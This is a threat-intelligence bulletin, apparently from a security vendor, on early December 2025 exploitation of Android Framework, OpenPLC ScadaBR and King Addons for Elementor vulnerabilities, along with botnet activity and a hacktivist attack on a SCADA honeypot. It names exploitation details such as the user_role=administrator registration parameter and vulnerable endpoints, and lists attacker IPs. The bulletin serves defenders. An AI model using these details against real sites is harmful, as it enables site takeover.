December Starts with Intensified Cyberattacks Across Mobile and Industrial Systems

As December began, exploitation activity intensified across mobile, industrial, and web ecosystems. CISA added 4 new vulnerabilities to its KEV catalog, including Android Framework vulnerabilities and two long-standing OpenPLC ScadaBR flaws now linked to real-world attacks. The King Addons for Elementor WordPress plugin also came under active exploitation, affecting more than 10,000 sites.  

Botnet operators like EnemyBot, Sysrv-K, Andoryu, and Androxgh0st escalated campaigns against exposed cloud services, routers, and web applications, taking advantage of configuration gaps and outdated systems.  

Forescout further reported that pro-Russian TwoNet exploited ScadaBR vulnerabilities highlighting ongoing risk to industrial environments running legacy components.

Key points:

• 4 vulnerabilities added to the CISA Known Exploited Vulnerabilities (KEV) catalog, reflecting recent exploitation activity. ‍
• King Addons for Elementor WordPress plugin vulnerability actively exploited ‍
• Cytellite sensor telemetry detected exploit and botnet-driven scanning activity targeting globally exposed assets.  
• 2 vulnerabilities exploited by a pro-Russian hacktivist group ‍
• Multiple PRE-NVD vulnerabilities were observed, suggesting potential exploitation prior to public disclosure.

Several high-impact vulnerabilities are currently trending across the cybersecurity community, demanding immediate attention and patch prioritization. Monitoring these emerging and widely discussed threats provides valuable insights, enabling organizations to make informed security decisions and strengthen their overall defense posture.

CVE-2025-8489 - Privilege Escalation Vulnerability in the King Addons for Elementor plugin for WordPress

A Privilege Escalation Vulnerability in the King Addons for Elementor - Free Elements, Templates, and Features plugin for WordPress allowed unauthenticated attackers to create administrator-level accounts, impacting versions 24.12.92 through 51.1.14 and more than 10,000 active installations. Wordfence patched the flaw in version 51.1.35 after determining that insecure input handling in the handle_register_ajax() function enabled attackers to specify user_role=administrator during registration, resulting in complete site compromise, including malicious file uploads, traffic redirection, and unauthorized content manipulation. Exploitation began on October 31, 2025, with over 48,400 blocked attempts recorded by Wordfence, primarily originating from IP addresses such as 45.61.157[.]120, 2602:fa59:3:424::1, 182.8.226[.]228, 138.199.21[.]230, and 206.238.221[.]25. Site administrators are strongly encouraged to update the plugin to the latest patched version, review their WordPress installations for any unauthorized administrator accounts, and closely monitor logs and site behavior for indicators of compromise or unusual activity.

CVE-2025-48572 - Elevation of Privilege Vulnerability in Android Framework

An Elevation of Privilege Vulnerability in the Android Framework component, affecting versions 13 through 16, was identified as being exploited in targeted attacks prior to patch availability. Google did not disclose technical details about the exploitation method, whether the flaw was used individually or as part of a chained attack, nor did it attribute the activity to any specific threat actor. Evidence referenced in the advisory indicated limited, targeted abuse in the wild, suggesting that attackers had already begun leveraging the vulnerability in focused operations before the December 2025 security update. This vulnerability was recently added to the CISA KEV catalog, underscoring its significance and the urgency of applying available fixes.  

CVE-2025-48633 - Information Disclosure Vulnerability in Android Framework

An Information Disclosure Vulnerability in the Android Framework component, impacting versions 13, 14, 15, and 16, was also found to be under active, targeted exploitation prior to Google’s December 2025 security release. Google did not provide technical specifics about how the flaw was abused, whether it was combined with other vulnerabilities, or the extent of the activity, and no attribution was made to any known threat actor. Advisory notes indicated that available evidence pointed to limited, focused exploitation in the wild, suggesting attackers had already begun extracting sensitive data through this flaw before patches were issued. The vulnerability has since been added to the CISA KEV catalog, reinforcing the need for immediate remediation.  

CVE-2021-26828 - Unrestricted Upload of File with Dangerous Type Vulnerability in OpenPLC ScadaBR

An Unrestricted Upload of File with Dangerous Type Vulnerability in OpenPLC ScadaBR allowed remote authenticated users to upload and execute arbitrary JSP files through the view_edit.shtm interface, enabling full server-side code execution. The flaw was recently tied to real-world exploitation after Forescout observed the pro-Russian hacktivist group TwoNet abusing it in September 2025 against a honeypot they believed to be a water treatment facility, using the access to deploy malicious scripts, disable logs and alarms, and alter system settings. With a proof-of-concept publicly available and confirmed exploitation in the wild, the vulnerability has since been added to the CISA KEV catalog.

CVE-2021-26829 - Cross-Site Scripting Vulnerability in OpenPLC ScadaBR

A Cross-Site Scripting Vulnerability in OpenPLC ScadaBR, exploitable via system_settings.shtm and affecting versions through 0.9.1 on Linux and 1.12.4 on Windows, has no official vendor patch and was recently linked to real-world exploitation. Forescout reported that in September 2025, the pro-Russian hacktivist group TwoNet targeted its honeypot mistaken for a water treatment facility and used the flaw to inject malicious scripts, disable logs and alarms, and modify system settings. The vulnerability allowed arbitrary script execution in the browsers of authenticated users, enabling session hijacking, credential theft, and unauthorized configuration changes within SCADA environments. Following confirmation of active abuse, the flaw was subsequently added to the CISA KEV catalog.

Cytellite telemetry captured active exploit attempts and mass scanning campaigns against exposed services globally. The data highlights which vulnerabilities are under attack and provides source IPs and payloads to authorized teams for detailed threat analysis and validation.

Multiple vulnerabilities were actively exploited by botnets, demonstrating automated infection and propagation across vulnerable systems. Analysis of MISP logs identified the top CVEs targeted by botnets, with payloads indicative of botnet activity, such as using wget commands with specific IP addresses, highlighting ongoing automated exploitation campaigns.

Active malware campaigns exploited specific vulnerabilities to deliver payloads and carry out post-exploitation actions. Each targeted vulnerability is proactively monitored, manually analyzed, and mapped to MITRE ATT&CK tactics and techniques. Insights are derived from the LOVI vulnerability intelligence platform, which aggregates and curates data from multiple sources, OSINT groups, blogs, and data leak sites.

Exploitation of OpenPLC ScadaBR vulnerabilities by TwoNet Hacktivists

According to Forescout, the OpenPLC ScadaBR vulnerabilities came under real-world exploitation in September 2025 when TwoNet, a pro-Russian hacktivist group known for DDoS attacks, website defacements, and operations against critical infrastructure targeted a honeypot they mistakenly believed was a water treatment facility. After gaining initial access using default credentials, the attackers conducted reconnaissance, established persistence by creating a new user account named “BARLATI,” and exploited the flaws to deface the HMI login page with the message “Hacked by Barlati.” They also modified system settings to disable logs and alarms, unaware the system was a decoy. This incident reinforces the need for continuous monitoring, credential hardening, and proactive defense across industrial environments still relying on outdated technologies.

PRE-NVD vulnerabilities refer to security flaws that are discovered, discussed, or even exploited in the wild before their official inclusion in the National Vulnerability Database (NVD). These early-stage vulnerabilities often emerge through threat actor chatter, exploit proof-of-concepts, and technical disclosures shared across social media platforms and underground forums, signaling potential exploitation risks before public awareness.

December’s early activity demonstrated how quickly attackers are shifting toward vulnerabilities in mobile platforms, legacy industrial systems, and widely used web applications, often exploiting weaknesses long before defenders can react. The continued abuse of OpenPLC ScadaBR flaws, rapid targeting of Android zero-days, and escalating botnet campaigns reinforce that visibility and timely intelligence are now essential, not optional. Loginsoft Vulnerability Intelligence (LOVI) delivers real-time insight into active exploitation, helping organizations prioritize what truly matters, respond faster, and stay ahead of evolving threat patterns.

FAQs:

1) What is OpenPLC ScadaBR?

A) OpenPLC ScadaBR is an open-source SCADA platform used for monitoring and controlling industrial automation systems. It provides HMIs, device management, and data visualization for PLC-based environments. Because many deployments run outdated or unsupported versions, it has become a frequent target for attackers exploiting legacy industrial systems.

2) Why do WordPress plugins remain a high-risk vector for exploitation?

Plugins are widely used, inconsistently maintained, and often run with high privileges, allowing a single vulnerable component to provide attackers with full administrative control over a site.

3) What does “PoC available” mean, and why does it increase risk for a vulnerability?

A) “PoC available” means a working exploit for the vulnerability has been publicly released, proving it can be abused. This helps defenders test and validate fixes, but it also gives attackers a ready-made blueprint, often leading to rapid and widespread exploitation if systems remain unpatched.

4) Why do attackers continue to exploit older vulnerabilities even when patches exist?

A) Attackers frequently target outdated or unpatched systems because many organizations delay updates, run legacy equipment, or rely on unsupported software. These gaps create predictable entry points that threat actors can exploit with minimal effort, making old vulnerabilities just as dangerous as new ones.